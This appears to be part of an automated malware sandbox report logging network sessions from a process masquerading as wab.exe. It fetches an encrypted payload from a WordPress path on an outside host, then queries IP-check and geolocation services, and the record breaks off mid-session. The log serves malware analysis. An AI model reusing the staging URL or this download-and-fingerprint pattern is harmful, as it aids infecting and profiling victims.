                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.549727193.122.6.168806752C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                Jul 25, 2024 10:19:40.432826996 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Jul 25, 2024 10:19:41.104821920 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 08:19:41 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: eade312548c64643ff0fec62b6c95492
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.549729193.122.6.168806752C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                Jul 25, 2024 10:19:41.846510887 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Jul 25, 2024 10:19:44.510621071 CEST730INHTTP/1.1 502 Bad Gateway
                                                Date: Thu, 25 Jul 2024 08:19:44 GMT
                                                Content-Type: text/html
                                                Content-Length: 547
                                                Connection: keep-alive
                                                X-Request-ID: b35c9ea9accde6245da47c4033bddf27
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549713108.167.181.2514436752C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 08:19:19 UTC197OUTGET /wp-includes/QMHHyMk225.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: www.reap.skyestates.com.mt
                                                Cache-Control: no-cache
                                                2024-07-25 08:19:19 UTC249INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 08:19:19 GMT
                                                Server: Apache
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Last-Modified: Wed, 24 Jul 2024 01:50:18 GMT
                                                Accept-Ranges: bytes
                                                Content-Length: 277056
                                                Content-Type: application/octet-stream
                                                2024-07-25 08:19:19 UTC7943INData Raw: d7 a8 51 05 e8 db dc 1a 48 63 d5 85 98 3d 46 e9 de 6b 2c 41 f3 35 9f 24 5c 9c ad 94 c5 17 74 62 67 02 f7 74 b6 8f b1 64 c6 2e 71 c7 2f 13 53 ac c3 a6 f8 23 2d 0c bb 04 ac 5a dd 8e a6 95 46 9d 21 b8 67 dc a3 0b 65 00 40 85 b2 43 3c 12 b7 0b 86 78 60 bf bd 4b a5 68 35 b0 7b 83 dc 01 78 7b cd 95 e0 08 01 f1 f2 87 1c 73 06 54 70 67 76 c3 9d 36 be 7e 6a 4b d8 c3 b6 5b c9 2a 00 bd 9a 4c e1 35 df b2 8c 4b 38 1c 4d 89 ef c3 49 1d 76 8b 65 e2 63 74 6a e7 a0 9f 86 29 a6 ea a7 44 13 3e 37 c9 2f ad 4c 48 bf 93 ee 05 05 30 5b ee 49 d8 2f 48 e6 41 31 52 7b 7e c9 17 b9 8a ea 49 87 41 b3 a7 25 af 55 da ed 2b 38 28 d0 56 84 3a 8f 21 7a 0c 23 1d a7 85 9c a1 1e 8f 7c 1b ba 4f bc 2e 87 9a 52 e3 48 df a0 01 08 ba fb e0 e0 8e 38 af 84 c0 ba ce e8 79 48 4f 68 95 79 68 97 0e f9
                                                Data Ascii: QHc=Fk,A5$\tbgtd.q/S#-ZF!ge@C<x`Kh5{x{sTpgv6~jK[*L5K8MIvectj)D>7/LH0[I/HA1R{~IA%U+8(V:!z#|O.RH8yHOhyh
                                                2024-07-25 08:19:19 UTC8000INData Raw: 50 d2 e7 42 62 bb e6 64 1d 4f 49 90 ec 75 0d b6 dd ea f1 fc 9c d5 e7 82 2a f3 a1 40 f1 9a 0f 3e ad eb 76 8a eb 11 09 ba 18 3e 69 25 a0 67 16 e8 62 88 52 46 9a 00 72 78 59 67 d8 b4 8c 87 07 9a ab 5c c5 bd 22 8d 8b 71 12 89 ea 8b 41 49 61 0b 21 59 c1 0e e5 87 0b 9d 39 59 5d 1a 24 62 c0 b5 c4 b8 98 df 1d 38 f1 d8 46 ed f5 41 54 f5 68 24 bf 36 29 b7 2e 72 f8 e8 ee e0 26 59 93 c4 51 45 9c 95 e0 b5 c0 c4 c3 f5 f5 8a 33 15 60 62 49 06 bf 97 74 2b a4 00 f5 2f 72 6a de be 06 3b 89 7e 06 39 e1 3e 3b 4b 01 b4 7c ca e8 71 28 31 01 67 3a 44 e8 62 c3 31 a7 e9 d8 cb c7 12 45 29 c8 d4 e4 a2 8c 1c 88 68 cc 3e a7 5c 55 28 93 73 30 9c 90 44 35 bd 6e 57 77 57 54 81 be 8c 24 21 0c 7c d2 61 ce 46 be 15 87 01 bc 6b 11 f1 58 2c 54 2d cf 63 55 7a c8 6f e3 ab 96 7b d5 7b 46 83 5b
                                                Data Ascii: PBbdOIu*@>v>i%gbRFrxYg\"qAIa!Y9Y]$b8FATh$6).r&YQE3`bIt+/rj;~9>;K|q(1g:Db1E)h>\U(s0D5nWwWT$!|aFkX,T-cUzo{{F[
                                                2024-07-25 08:19:19 UTC8000INData Raw: ae fc 54 12 7b 4c c7 74 bb 10 e2 4d ff 87 3f 69 c7 99 57 e1 da 0a c9 51 a2 23 67 66 c8 e9 9b 79 f2 82 5e 9e 79 1a 19 74 58 77 da fe bb 47 03 f3 a4 be ce f5 85 a5 52 c6 65 a6 f3 ff b5 8b 8b cc a6 f1 39 96 98 4a 5d 29 cb 98 5f 64 5e a0 79 e4 76 5c 55 9a 81 b2 23 fa 7a 4a 8f 4b d8 2e 68 6c c8 c7 34 8d dc 48 da e4 4b 0a 1b db cd 8b 44 80 20 cc b1 1b ac d5 d4 9e b2 87 a6 97 9b ba db f7 65 b0 6a 84 ab 2d 35 02 5c f1 61 85 d3 9e c6 62 41 29 e0 90 0e 05 59 41 7a 68 3e ea b8 41 b3 49 a1 b1 0d e6 61 c2 dc 2e 33 fd 39 85 97 44 00 95 92 4f 59 a6 5a 09 c3 6a 3e cb 07 1b f4 48 d6 29 0d e1 44 dd c9 68 7e 37 61 66 a4 3b 5b 86 6d f9 8f aa b4 f4 fc 75 c1 a2 d8 a3 8d 63 ab 1d e3 b9 75 d1 d4 84 60 0f 03 24 99 33 28 2c 10 0a c1 a7 c9 db 30 55 6b 58 1b f5 71 12 e5 66 9d 4e f8
                                                Data Ascii: T{LtM?iWQ#gfy^ytXwGRe9J])_d^yv\U#zJK.hl4HKD ej-5\abA)YAzh>AIa.39DOYZj>H)Dh~7af;[mucu`$3(,0UkXqfN
                                                2024-07-25 08:19:19 UTC8000INData Raw: 51 ed 91 7b c2 8d 9a 37 10 08 1f 6c 0e f5 67 3e 0d 2f 7b 26 2a a5 29 b3 04 dc 15 0b 82 33 6d 27 af 47 3d 64 2f 68 76 94 b5 0c 75 d3 0c 0c 71 50 2a 26 6a 8e 3b 4a 0a 46 a2 a4 33 33 e5 f9 74 6e 66 f8 93 bc ec fb 30 48 9a ad 7e f8 f1 47 b7 d1 6b 35 77 e1 70 4c d7 cc 3d 56 a5 26 2e b1 f4 a3 a2 92 e5 c8 ab 3f 2d 73 43 ae b4 61 59 53 0c 83 b5 cb 14 ce 7d 04 ad b0 a1 d2 0a 61 4b dd 41 9f ae cc 80 47 c0 90 00 20 fc ff d3 3b e5 f0 4c 8b d8 f1 62 17 11 c4 d7 55 69 ef 13 80 79 90 e9 cd a0 7b 1b 2d 44 85 b6 31 e7 fc b7 7b 2f 6d 48 6a bd 4b af 7b 63 c2 4d 92 dc 71 50 2d cd 95 ea 1b 16 e0 e5 f5 6b 74 06 24 1f b1 76 c3 97 36 96 24 6a 4b d2 d2 a0 34 95 2a 80 b7 89 54 fe 3d 17 3e 9d ff 41 be bb 31 ee 85 84 2d 35 f2 14 1f 2a 6e 77 50 c7 ed ed 44 97 9e a9 f3 7d 51 49 fa 54
                                                Data Ascii: Q{7lg>/{&*)3m'G=d/hvuqP*&j;JF33tnf0H~Gk5wpL=V&.?-sCaYS}aKAG ;LbUiy{-D1{/mHjK{cMqP-kt$v6$jK4*T=>A1-5*nwPD}QIT
                                                2024-07-25 08:19:19 UTC8000INData Raw: 07 af 3a d1 78 f3 bc a1 bb 41 b3 32 6b b0 09 7d 3d 61 77 b8 34 19 88 cc 14 33 6c 1c a8 21 ed 50 df a4 39 40 d6 ed 96 70 42 10 43 38 67 77 83 e6 7f 0a b8 f5 a0 93 fc 96 01 3a d5 06 f2 bd 40 f1 98 71 6b ad da ea f8 ab 13 09 ca 0e 16 e8 24 a0 de b4 16 71 de 57 57 9e 22 e6 70 59 af a6 9b 8c 99 03 e8 8b 5e c5 be 99 a5 0a 7b 19 f1 98 7b 40 2a 4f 4c 27 60 f7 27 ae 87 0b 83 cb 58 74 68 82 6a b3 05 d3 35 91 f7 dc 39 d4 c4 4e 3c 12 52 51 eb 6f 34 23 b1 57 8d 2f 57 ea 8c b1 c5 35 55 eb 28 ff 45 96 9f d7 a3 a9 17 52 d8 fd df 04 04 65 70 bc e8 84 97 7e 21 b9 00 f5 af 6c 6a de f9 1d 3b 89 7e 79 c1 ab 3f 4b 13 49 b0 75 af 37 b6 28 3b 18 60 00 5b e4 e8 ec 80 a7 e8 f7 a9 ca 18 59 28 ab 7e d0 bd cb 1a 88 68 cc 8f 86 44 36 47 f3 c0 40 3e bf 4e 42 94 67 7a a8 2b 66 8a cb c2
                                                Data Ascii: :xA2k}=aw43l!P9@pBC8gw:@qk$qWW"pY^{{@*OL'`'Xthj59N<RQo4#W/W5U(ERep~!lj;~y?KIu7(;`[Y(~hD6G@>NBgz+f
                                                2024-07-25 08:19:19 UTC8000INData Raw: f9 e4 d0 e3 ae 14 ae 84 a0 93 ce e8 68 08 67 6c b5 79 6e f8 f1 f9 03 f9 dc e0 27 e2 99 f6 54 97 2c 8f b6 c1 30 55 12 71 07 3c 74 bb 0a ee 45 d3 cd 38 64 cf b5 52 f7 d1 98 e7 55 a2 84 6c 66 c8 ab 9d 79 f1 81 5a 8f 7d 40 14 44 4e 66 de e0 95 71 2f f3 b5 9c d1 fc ab fe 7e c6 74 b2 ec f2 9b 99 a0 ab b6 e6 16 b6 a8 05 4c 2d d4 bf 71 24 64 a0 16 fd 69 7f 7f f1 b1 e3 32 fa 0a dd a1 46 f5 38 51 e9 d7 b7 67 84 29 7d d2 c9 59 20 17 e3 ed 8b 30 e0 98 32 a7 09 2c c8 d5 f1 b6 f4 4c 88 e9 ed 85 ec 15 98 35 eb 12 27 3f d9 fc 52 61 85 d9 c4 84 42 41 5f ea 4e 71 77 25 78 5a 18 4d 8f d7 37 b3 3d b4 32 0d 96 61 34 d8 2e 34 e8 3c be 92 7b 20 95 91 c4 71 1b 5a 2d c5 05 2e ca 79 73 fe 96 87 05 08 9c 9e f5 74 6c 55 27 15 d9 ed 1e 77 4c 6b 3e 85 b9 b4 87 0a 66 c6 b9 fa 0f f3 60
                                                Data Ascii: hglyn'T,0Uq<tE8dRUlfyZ}@DNfq/~tL-q$di2F8Qg)}Y 02,L5'?RaBA_Nqw%xZM7=2a4.4<{ qZ-.ystlU'wLk>f`
                                                2024-07-25 08:19:19 UTC8000INData Raw: 58 0d 2b 29 1c 25 4d 87 01 b1 38 d7 3e 41 fd fe 77 60 ad 0e 97 80 fb 6f 75 5b 11 46 66 1b 48 87 f7 bc 2e 40 84 91 7b cc ee c1 1d 04 7a 09 42 9c f3 67 34 1b fa 6f 35 10 40 3b 8a 0e cf 13 64 c3 be 2d 2d 87 50 1a 72 5b ef 67 94 da a5 dd 84 24 b8 70 75 36 f6 c1 a5 49 52 a7 63 c5 0f b4 0f 83 b3 41 49 62 2a 14 83 87 d1 37 ea cf 15 29 a4 a8 6f c7 73 4a 41 1a e4 d2 63 69 9b 78 03 87 40 8c e4 4b 9a de ba fd c3 b8 26 f1 60 5d dc df 34 55 32 ae d6 bc ea 84 c8 df 2b a4 44 d2 42 39 70 2f 46 bf ea ae cc 9c 7c bc ee 28 2a fc db c2 3d cd b9 64 fc d2 71 40 17 00 d3 ee 89 7e 39 0a 9b 7d ea e6 db 9e dc 9b ff bb 85 b2 9d d3 c8 9f 3f 3e 78 6a ac b3 4b 8d 0a 75 b0 71 5d dc 01 52 7b cd 95 a1 14 01 f1 f2 87 1c 73 15 54 70 67 16 c2 9d 36 cd 7f 6a 4b c8 c3 b6 5b 8c 2a 80 bc 81 7c
                                                Data Ascii: X+)%M8>Aw`ou[FfH.@{zBg4o5@;d--Pr[g$pu6IRcAIb*7)osJAcix@K&`]4U2+DB9p/F|(*=dq@~9}?>xjKuq]R{sTpg6jK[*|
                                                2024-07-25 08:19:19 UTC8000INData Raw: 5d d5 fd dd b4 ff a7 b2 4f d3 1b fe 02 1e 9e 0d dc 4c 60 9e b2 e6 62 d0 c8 c3 ac c7 53 a2 75 c6 e5 1b 70 07 a2 27 81 3e f3 c6 84 fb 49 a5 30 ef d9 60 0b 2b 60 7d b2 36 71 1b 83 15 39 6c c4 d7 0a e6 7c de a1 5e 33 e4 cb 9c 00 f1 e8 52 1d 49 65 8b 89 52 1b bc f3 9f 2b ef 91 1d f4 8c 38 d2 bc 40 f1 90 1e 51 df 98 c8 8a 8c 7e 20 b8 18 38 64 2c b1 dc d0 bc 56 cd 22 29 b2 19 42 74 4a ab d0 a5 84 eb 59 bc ba 2c aa e7 8d 8d 8d 68 1c f3 9f 8d 33 51 6f 5d 51 36 ee 24 ae 81 18 91 3d 4f 41 1a 0a 4a c0 b5 bc 1c 99 df 1b 11 c3 cf 4e 45 c3 5b 40 e7 54 21 30 b6 2f a4 24 46 e5 d3 49 b7 74 18 84 9c d7 a5 9c 9f c0 8c 8a d2 52 d2 df b2 3b 04 63 67 df 3f 88 83 8a 22 bb 0a 96 d6 50 7c 86 25 a9 3b 83 65 0d 24 e7 3f 3b 31 03 bc 5d b1 5a 71 2e 28 14 60 11 5c d2 70 ac a8 53 e9 d2
                                                Data Ascii: ]OL`bSup'>I0`+`}6q9l|^3RIeR+8@Q~ 8d,V")BtJY,h3Qo]Q6$=OAJNE[@T!0/$FItR;cg?"P|%;e$?;1]Zq.(`\pS
                                                2024-07-25 08:19:19 UTC8000INData Raw: e6 3a e6 df c6 7e 84 4a e0 08 78 0c 25 6f ef cb 9e d0 1d 9f 2b 69 16 25 b8 5e e8 a7 50 e3 4e f7 fb 01 16 f3 ec e5 f1 aa 10 bd 86 a0 b8 dd e0 68 00 63 2b b3 51 72 96 0c f3 6c e8 b2 1e 2d 8d 8f fc 7c 99 04 9c b2 ae cb 46 1b 6a 61 d7 8a ba 13 e8 5c f5 d4 c1 68 d5 92 46 ea f6 8e e4 a5 a2 93 6d 77 cc c4 c1 79 f2 98 4f 97 51 4b 1b 74 5f 64 de fe bb 4a 2f d3 a4 b0 3a f5 85 9c 5d d7 62 c4 a9 b1 b5 be e4 e5 a5 e2 0f fa c4 15 5d 23 e3 89 5d 64 49 b3 03 f9 7f 2e 0b e5 9a c2 35 d6 94 f3 8f 41 c8 c6 43 fc cc b5 64 9a 22 3b c6 ca e6 20 65 ca db 75 43 b0 88 c9 c3 47 2d c8 a4 88 9e 74 4c 82 91 dc 5b ef 3a a3 62 fa 1e 01 78 19 f9 12 61 85 d8 93 b9 10 04 77 e0 e0 ac 52 40 5e d8 3d 25 f7 56 0e b3 3f 2b 37 14 f7 6f 48 90 34 41 84 76 af e7 f5 15 8c 83 79 fb 83 46 5f 40 4d 2f
                                                Data Ascii: :~Jx%o+i%^PNhc+Qrl-|Fja\hFmwyOQKt_dJ/:]b]#]dI.5ACd"; euCG-tL[:bxawR@^=%V?+7oH4AvyF_@M/
                                                2024-07-25 08:19:19 UTC8000INData Raw: 57 cf 73 86 17 1d 82 33 6f f6 58 25 94 78 1c ee c0 31 ec 82 31 bd 8a 7f 7d b2 01 d8 45 34 c9 ec 56 3d 53 17 ed 5b 8b 3f 1a 08 25 24 a3 62 9b 73 41 8b 4f 5e 68 b0 1e cb a6 f2 10 1b 19 3d 20 ec ca 53 96 f8 0f 0d 33 aa 12 5c c6 8f 6f 1d 65 78 09 4e 9c f8 19 13 1b d1 7e 24 35 9c 72 8a 04 d4 95 2c 9f be 29 27 af 57 1f 65 8b ef 66 85 c2 bf 56 fa 9d 46 8e af 20 84 91 86 6c 0a 31 46 d2 0c 05 24 9b e9 16 6e 62 50 68 a6 9e ea 33 09 f6 0f 5b e3 8f 6f b7 c2 6f 5a 0b 9f 71 46 75 78 20 24 87 20 2e c1 56 ce d7 92 e4 d9 88 29 53 e6 42 ae b0 29 55 42 1d f3 bc ff bd dc 7c 0e b1 3c 75 a6 1e 00 77 ad 97 9f a4 c6 96 69 9e 86 01 2a f6 d4 d4 0e 88 f1 64 fc de 82 43 15 00 d1 f3 89 1b c9 57 93 1c 8d d1 de a0 0d 43 08 2b a2 b0 43 c5 fa 6d 18 38 6e 73 b8 85 75 a4 68 75 b8 6a 84 ae
                                                Data Ascii: Ws3oX%x11}E4V=S[?%$bsAO^h= S3\oexN~$5r,)'WefVF l1F$nbPh3[ooZqFux $ .V)SB)UB|<uwi*dCWC+Cm8nsuhuj


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.549715188.114.97.34436752C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 08:19:23 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-07-25 08:19:23 UTC710INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 08:19:23 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 24286
                                                Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ls1%2FIxb23PwTjc5putOEGiahEyl%2FfFfsu1Re4CvaUoRdDnUceK1Ja%2B7JW0kDTETCBZk7EB9suQ%2FUauz7agBO40HFEcckEF64en3zmKNZxNpUgnCOLQrAPKXbyyRLXfTVjWG%2BHWVV"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8a8ab987e921c472-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-07-25 08:19:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-07-25 08:19:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.549716188.114.97.34436752C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 08:19:25 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-07-25 08:19:25 UTC714INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 08:19:25 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 24288
                                                Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DmNDkdr0V8%2FvHqJTytMPBS1S5PiUWKR9EH2wSam%2FXn%2BuvskQfSxuMfL3qndJnBdw%2FTn4ZY%2B%2BpBhaZnJytzkbBnySMtVGrR6tcHLUXRz3olRY3l1%2F6VQ33hEwL4qMjdqu9iYsxZZx"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8a8ab9954d3b43a4-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-07-25 08:19:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-07-25 08:19:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.549718188.114.97.34436752C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 08:19:28 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-07-25 08:19:28 UTC708INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 08:19:28 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 24291
                                                Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y0yW6yEmsh8tfB1ikRlzRnaCABItf%2BI9iMvQtQrdi78vX9LzJbs%2FD8FlbxFp%2FV8gRAL4hOktUvyqPlE4wm0L0O6o%2BF8xjtk3woMMxM4ynqJLlLk4mjSoAFCjvgjiMiyd8magVPm6"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8a8ab9a83d9343c1-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-07-25 08:19:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-07-25 08:19:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.549720188.114.97.34436752C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 08:19:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
